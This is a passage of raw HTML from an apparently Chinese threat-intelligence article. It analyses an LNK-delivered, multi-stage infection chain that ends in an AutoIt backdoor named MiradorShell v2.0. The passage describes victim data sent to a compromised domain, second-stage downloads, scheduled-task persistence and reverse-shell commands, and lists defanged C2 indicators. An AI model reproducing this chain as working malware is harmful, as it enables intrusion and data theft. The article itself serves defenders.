37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">将混淆的代码格式化后，发现该LNK运行后首先通过递归搜索系统目录(dir /b /s %windir%\system32\*wers*l.?x? &gt; %temp%\PJoaEy.TiU)定位PowerShell.exe路径并保存到临时文件，随后调用该路径执行恶意PS1脚本。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">接着，PS1脚本会动态编译C<a class="wx_topic_link" topic-id="mk6is8ct-17undl" style="color: #576B95 !important;" data-topic="1">#解密函数</a>，其解密算法如下：</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4884318766066838" data-type="png" data-w="778" data-imgfileid="100024124" src="https://wechat2rss.xlab.app/img-proxy/?k=6d882536&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYSDskIFPSz8eMWxjINB5qg7ve5usO3lUIfPa9mOCwuIv2q1b0gIGBYQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">最后，搜索原始LNK文件并从中解密出内存加载的第一阶段Payload，同时释放诱饵文档并清理痕迹，最终实现无文件攻击。释放的PDF诱饵文档与Soft Commitment Letter.docx有相似之处。</span></span></p></div></div><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0651515151515152" data-type="png" data-w="660" data-imgfileid="100024125" src="https://wechat2rss.xlab.app/img-proxy/?k=ca667c91&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYoriarDLhexoSntRGryG9SiaFhCfxTp3rmyQeGG3iaDJU10dZOZZIGMKRQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">第一阶段Payload经过C<a class="wx_topic_link" topic-id="mk6itco1-o53law" style="color: #576B95 !important;" data-topic="1">#解密函数处理过后</a>，发现功能主要包括了三个部分：沙箱/虚拟机检测、受害者信息收集和加载二阶载荷。解密后的载荷内容如下：</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.36416184971098264" data-type="png" data-w="865" data-imgfileid="100024126" src="https://wechat2rss.xlab.app/img-proxy/?k=be2ac0fa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYmdC6vRzdaOLIEbgfXiaFbqfCElC2Q9QibQsQNFkJvok1FOANxnSy8JRA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">沙箱/虚拟机检测功能描述</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">一阶恶意载荷会通过执行SystemInfo并检查系统信息中是否包含 &#34;Google Compute Engine&#34;，如果是 GCE (云服务器/沙箱)则只进行受害者信息收集&amp;上传，不进行后续二阶载荷下载执行。</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3972772277227723" data-type="png" data-w="808" data-imgfileid="100024127" src="https://wechat2rss.xlab.app/img-proxy/?k=b8eda70e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twY3tlaK9RVwtPDCAXcwX7P0pXb4pdEgOVHRVdpbjMvaZbm5ibfdavFtlQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">受害者信息收集功能描述</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">一阶载荷会收集三个部分的信息：系统信息（SystemInfo）、收集进程列表（tasklist）、收集文件列表(桌面、文档、下载、最近访问、开始菜单、程序目录)。收集完成后构建POST请求发送至二阶服务器（https[:]//techcross-wne[</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">.</span></span><span leaf="">]com/include/plugin/snoopy/board/register.php?id={hostname}&amp;sn={请求数}）。</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3967459324155194" data-type="png" data-w="799" data-imgfileid="100024128" src="https://wechat2rss.xlab.app/img-proxy/?k=b5925bb0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYOLSQTTnNOM9XqwDHG3g6MtENJQ7fbsZ4HmvZPThSeM3TRofOrWQjqg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">加载二阶载荷功能描述</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">如果当前运行环境通过沙箱/虚拟机检测，发起一次二阶载荷请求&amp;执行操作，请求地址为https[:]//techcross-wne[.]com/include/plugin/snoopy/board/register.php?id={hostname}&amp;sn={请求数}。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">测试发现二阶服务器下发的前几个操作指令如下图所示：</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.1203389830508474" data-type="png" data-w="590" data-imgfileid="100024129" src="https://wechat2rss.xlab.app/img-proxy/?k=54dfbc65&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYQGerOPu4ZtRbWspq5cIjgNAKcMib4Wn2DUWTnnVgDe2P49Ie1dwk5dg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">二阶载荷功能较为简单主要包括两个部分，第一个部分是从https[:]//techcross-wne[.]com/include/plugin/snoopy/board/libs/ati.dat下载程序为AutoIt3.exe解析程序（合法程序），然后https[:]//techcross-wne[.]com/include/plugin/snoopy/board/libs/mrd.dat下载au3脚本，解密为MiradorShell v2.0载荷，第二部分是创建一个名为WndowsUpdate_BCF24B33-5871-1795-C09F-F7902903138A每隔 5 分钟自动运行一次MiradorShell v2.0的计划任务。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">值得注意的是我们发现一阶恶意载荷所请求的二阶服务器域名techcross-wne.com应该是韩国公司Techcross-WNE (TECHCROSS Water &amp; Energy) 的官方合法域名。</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.47465437788018433" data-type="png" data-w="868" data-imgfileid="100024130" src="https://wechat2rss.xlab.app/img-proxy/?k=6a4afdcd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYTNhiaBV0zoZbk6fw2JHCyzgh2jM3DAWoub2oEQLdhGp3FeczOrpBsqA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">下图是该网站的CA证书信息：</span></span></p></div></div><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9768160741885626" data-type="png" data-w="647" data-imgfileid="100024131" src="https://wechat2rss.xlab.app/img-proxy/?k=5cc90c2c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYm5dXibgRXh66nc3kLK6KqMcyCMickUs5sjthwqWAzoFVaOaGe5cgAYBA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">因此，该服务器可能已被攻陷，同时我们根据请求的二阶服务器的URL路径信息来看include/plugin/snoopy/board，推测该站点可能使用了Snoopy类库，被攻击者使用相应漏洞攻破。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">3. 攻击组件分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">最终的载荷由AutoIt语言编写，为方便后续持续跟踪工作同时根据代码功能和代码中出现的编译和配置信息，我们将其命名为MiradorShell版本为2.0，后文简称为MiradorShell。</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.27631578947368424" data-type="png" data-w="684" data-imgfileid="100024132" src="https://wechat2rss.xlab.app/img-proxy/?k=16f2b2b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twY0iauweAVNZIwp6JJ17icPXqLSM6JgF0LianoEnktdhC9z8QyWkL0utNicg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5160349854227405" data-type="png" data-w="686" data-imgfileid="100024133" src="https://wechat2rss.xlab.app/img-proxy/?k=8264290d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYODhIp6iaszLuaubbpnIAxmofia2LHtHO0MlmwBcCb9icMXzEM0Dt6saSg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">MiradorShell是一个使用AutoIt编写的后门脚本。以下是对MiradorShell功能的详细技术分析。</span></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">3.1）核心功能概述</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">MiradorShell是一种基于反向连接的后门脚本，连接到指定的命令控制服务器（65.21.182[.]178:443），具备多维度控制能力：首先支持反向Shell功能，允许攻击者远程执行cmd命令并实时获取回显；其次提供完整的文件管理功能，包括文件上传下载、目录遍历及文件删除操作；同时具备远程程序执行能力，可在受害者主机上直接运行指定程序；此外还集成指纹识别模块，通过硬件特征生成唯一受害者ID以实现精准控制。</span></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">3.2）功能模块分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">MiradorShell运行后，首选检查是否存在互斥体（Global\ED74CC72-AA6C-B091-B820-631489DA5F3B），如果存在则退出，以确保同一时间只有一个木马实例在运行。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">接着，使用ws2_32.dll(Winsock)直接发起TCP连接，连接成功后，发送数据包（MSITRUAVDWAX+[受害者ID]+2.0），其MSITRUAVDWAX是上线包的标识头，受害者ID是通过计算机名CPU信息硬盘序列号等信息组合拼接而成。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">然后，进入命令分发循环，等待服务器发送指令，通过&#34; &#34;分割解析命令和参数，MiradorShell v2.0支持的指令如下所示：</span></span></p><table style="width:572px;"><tbody><tr><td data-colwidth="103"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">命令关键字</span></span></p></td><td data-colwidth="214"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">对应功能函数</span></span></p></td><td data-colwidth="255"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">描述</span></span></p></td></tr><tr><td data-colwidth="103"><p><span leaf=""><span textstyle="" style="font-size: 15px;">cmd</span></span></p></td><td data-colwidth="214"><p><span leaf=""><span textstyle="" style="font-size: 15px;">REMOTESHELLPROCESS</span></span></p></td><td data-colwidth="255"><p><span leaf=""><span textstyle="" style="font-size: 15px;">启动交互式CMD Shell</span></span></p></td></tr><tr><td data-colwidth="103"><p><span leaf=""><span textstyle="" style="font-size: 15px;">upload</span></span></p></td><td data-colwidth="214"><p><span leaf=""><span textstyle="" style="font-size: 15px;">UPLOADPROCESS</span></span></p></td><td data-colwidth="255"><p><span leaf=""><span textstyle="" style="font-size: 15px;">接收服务器发送的文件并保存到本地</span></span></p></td></tr><tr><td data-colwidth="103"><p><span leaf=""><span textstyle="" style="font-size: 15px;">download</span></span></p></td><td data-colwidth="214"><p><span leaf=""><span textstyle="" style="font-size: 15px;">DOWNLOADPROCESS</span></span></p></td><td data-colwidth="255"><p><span leaf=""><span textstyle="" style="font-size: 15px;">读取本地文件并发送给服务器</span></span></p></td></tr><tr><td data-colwidth="103"><p><span leaf=""><span textstyle="" style="font-size: 15px;">listdir</span></span></p></td><td data-colwidth="214"><p><span leaf=""><span textstyle="" style="font-size: 15px;">LISTDIR</span></span></p></td><td data-colwidth="255"><p><span leaf=""><span textstyle="" style="font-size: 15px;">遍历指定目录，返回文件/文件夹列表及大小</span></span></p></td></tr><tr><td data-colwidth="103"><p><span leaf=""><span textstyle="" style="font-size: 15px;">delete</span></span></p></td><td data-colwidth="214"><p><span leaf=""><span textstyle="" style="font-size: 15px;">DELETEPROCESS</span></span></p></td><td data-colwidth="255"><p><span leaf=""><span textstyle="" style="font-size: 15px;">删除指定的文件或文件夹</span></span></p></td></tr><tr><td data-colwidth="103"><p><span leaf=""><span textstyle="" style="font-size: 15px;">run</span></span></p></td><td data-colwidth="214"><p><span leaf=""><span textstyle="" style="font-size: 15px;">RUNPROCESS</span></span></p></td><td data-colwidth="255"><p><span leaf=""><span textstyle="" style="font-size: 